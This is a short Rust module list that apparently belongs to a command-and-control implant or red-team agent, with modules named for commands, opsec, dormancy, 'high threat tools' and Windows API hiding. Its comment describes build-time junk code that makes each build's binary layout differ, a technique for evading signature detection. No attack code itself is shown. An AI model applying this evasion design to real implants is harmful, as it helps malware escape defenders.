pub mod auth;
pub mod commands;
pub mod config;
pub mod dormant;
pub mod file_handling;
pub mod high_threat_tools;
pub mod identity;
pub mod modules;
pub mod networking;
pub mod opsec;
pub mod state;
pub mod tasks;
pub mod util;
#[cfg(target_os = "windows")]
pub mod win_api_hiding;

// Seed-derived junk-code module generated by build.rs (issue #67). Kept alive
// via std::hint::black_box at startup so per-seed builds differ in layout.
pub mod mutation {
    include!(concat!(env!("OUT_DIR"), "/mutation.rs"));
}
